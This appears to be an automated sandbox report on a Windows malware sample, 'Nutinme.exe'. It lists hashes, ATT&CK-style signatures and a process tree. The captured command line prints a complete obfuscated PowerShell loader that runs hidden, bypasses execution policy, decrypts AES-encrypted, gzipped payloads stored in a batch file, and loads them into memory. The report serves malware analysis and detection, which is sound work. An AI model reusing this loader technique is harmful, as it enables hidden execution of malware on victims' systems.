Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
24-08-2024 02:17
Static task
static1
Behavioral task
behavioral1
Sample
Nutinme.exe
Resource
win7-20240705-en
General
-
Target
Nutinme.exe
-
Size
274KB
-
MD5
d4203d29b2e6a217009d7c48406f6deb
-
SHA1
d65f0c2e2ab8a8b3a28d4ec6b91a7e8cd7168f67
-
SHA256
7e412d3d7477ac6c9047d42bc2acbda8a2a28b0160d4ba7a6e7e916c640f07ae
-
SHA512
eeb57f268eb44a2cb423410f3ce0c1466f9e16fd4d5490df4ec547cd2ca1c935f0325cf926c0d064b2854c985d19df3954de5ee14c0248d34d31a35fef559d04
-
SSDEEP
6144:TVoCgTOlxhtaiXhKKdJNzcgpL999eoBw1AjtrDWRTxe3xj8bO5dDtS:TUiLhBXhKsFjBz9e8trDITxOxj8bO0
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2588 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nutinme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2672 wrote to memory of 2868 2672 Nutinme.exe 30 PID 2672 wrote to memory of 2868 2672 Nutinme.exe 30 PID 2672 wrote to memory of 2868 2672 Nutinme.exe 30 PID 2672 wrote to memory of 2868 2672 Nutinme.exe 30 PID 2868 wrote to memory of 2856 2868 cmd.exe 32 PID 2868 wrote to memory of 2856 2868 cmd.exe 32 PID 2868 wrote to memory of 2856 2868 cmd.exe 32 PID 2868 wrote to memory of 2856 2868 cmd.exe 32 PID 2856 wrote to memory of 2020 2856 net.exe 33 PID 2856 wrote to memory of 2020 2856 net.exe 33 PID 2856 wrote to memory of 2020 2856 net.exe 33 PID 2856 wrote to memory of 2020 2856 net.exe 33 PID 2868 wrote to memory of 2588 2868 cmd.exe 34 PID 2868 wrote to memory of 2588 2868 cmd.exe 34 PID 2868 wrote to memory of 2588 2868 cmd.exe 34 PID 2868 wrote to memory of 2588 2868 cmd.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nutinme.exe"C:\Users\Admin\AppData\Local\Temp\Nutinme.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Nutinme.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\net.exenet file3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file4⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNCwayIEKMX1wu1G6Nv1zAaGZ7BzZJSzSBMrPDlUebo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6PkW5gH2K764u40AVDSDA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $guWQG=New-Object System.IO.MemoryStream(,$param_var); $JgRlM=New-Object System.IO.MemoryStream; $jfych=New-Object System.IO.Compression.GZipStream($guWQG, [IO.Compression.CompressionMode]::Decompress); $jfych.CopyTo($JgRlM); $jfych.Dispose(); $guWQG.Dispose(); $JgRlM.Dispose(); $JgRlM.ToArray();}function execute_function($param_var,$param2_var){ $CpqWe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zuKbL=$CpqWe.EntryPoint; $zuKbL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Nutinme.bat';$oGCvp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Nutinme.bat').Split([Environment]::NewLine);foreach ($PoCbV in $oGCvp) { if ($PoCbV.StartsWith(':: ')) { $FqqAF=$PoCbV.Substring(3); break; }}$payloads_var=[string[]]$FqqAF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
270KB
MD5c89cd471198718a96c3adb9f7298a90e
SHA1d26bef68f50311f75b44d13720b4b07f2e941084
SHA25649249044131c0c4fea5fcb837d764aaf8997f05105678af296d1a470b91fc640
SHA5125720b046af3f9ab5158a4d5c43f9683781b33abcd7ef0415cf21fd8b187744f568651b72f9aaf37ee42c3e276b636488e030f1553a60efd1917b2d68153363bf